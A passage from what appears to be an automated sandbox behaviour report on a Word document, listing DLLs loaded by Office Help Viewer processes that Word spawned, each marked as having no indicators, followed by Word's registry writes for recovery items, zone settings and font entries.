c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\cryptbase.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\microsoft office\office14\1033\clvwintl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\help\hxds.dll
c:\windows\system32\winspool.drv
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\help\msitss55.dll
c:\windows\system32\mpr.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mlang.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\msimtf.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\propsys.dll
c:\windows\system32\winmm.dll
c:\program files\microsoft office\office14\msostyle.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\audioses.dll
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\system32\sxs.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\jscript.dll
c:\windows\system32\imgutil.dll
c:\windows\system32\pngfilt.dll
c:\windows\system32\msimg32.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\netutils.dll
c:\windows\system32\mssprxy.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\wintrust.dll

PID
1996
CMD
"C:\Program Files\Microsoft Office\Office14\CLVIEW.EXE" "WINWORD" "Microsoft Word"
Path
C:\Program Files\Microsoft Office\Office14\CLVIEW.EXE
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Office Help Viewer
Version
14.0.6015.1000
Modules
Image
c:\program files\microsoft office\office14\clview.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\program files\microsoft office\office14\msocf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\cryptbase.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\microsoft office\office14\1033\clvwintl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\help\hxds.dll
c:\windows\system32\winspool.drv
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\help\msitss55.dll
c:\windows\system32\mpr.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mlang.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\msimtf.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\propsys.dll
c:\windows\system32\winmm.dll
c:\program files\microsoft office\office14\msostyle.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\audioses.dll
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\system32\sxs.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\jscript.dll
c:\windows\system32\imgutil.dll
c:\windows\system32\pngfilt.dll
c:\windows\system32\msimg32.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\netutils.dll
c:\windows\system32\mssprxy.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\wintrust.dll

PID
1880
CMD
"C:\Program Files\Microsoft Office\Office14\CLVIEW.EXE" "WINWORD" "Microsoft Word"
Path
C:\Program Files\Microsoft Office\Office14\CLVIEW.EXE
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Office Help Viewer
Version
14.0.6015.1000
Modules
Image
c:\program files\microsoft office\office14\clview.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\program files\microsoft office\office14\msocf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\cryptbase.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\microsoft office\office14\1033\clvwintl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\help\hxds.dll
c:\windows\system32\winspool.drv
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\help\msitss55.dll
c:\windows\system32\mpr.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mlang.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\msimtf.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\propsys.dll
c:\windows\system32\winmm.dll
c:\program files\microsoft office\office14\msostyle.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\audioses.dll
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\system32\sxs.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\jscript.dll
c:\windows\system32\imgutil.dll
c:\windows\system32\pngfilt.dll
c:\windows\system32\msimg32.dll

Registry activity

Total events
2709
Read events
2226
Write events
472
Delete events
11

Modification events

PID
Process
Operation
Key
Name
Value
3040
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
uc$
75632400E00B0000010000000000000000000000
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1298661393
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661508
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661509
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
E00B000016A73ED37977D40100000000
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
0d$
30642400E00B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
{e$
7B652400E00B000006000000010000007C000000020000006C0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C006E007500650076006F002D0064006F00630075006D0065006E0074006F002E0064006F006300000000000000
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1298661380
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{8FFB8E85-5B2F-4356-8337-FA4160005FDB}
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\183295
183295
04000000E00B00003500000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C004E007500650076006F002D0064006F00630075006D0065006E0074006F002E0064006F006300130000004E007500650076006F002D0064006F00630075006D0065006E0074006F002E0064006F006300000000000100000000000000088037D37977D401953218009532180000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661405
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661406
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661405
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661406
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661426
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661427
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661407
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661408
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661407
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661408
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661428
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661429
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661430
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661431
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661432
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661433
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
3040
WINWORD.EXE
write
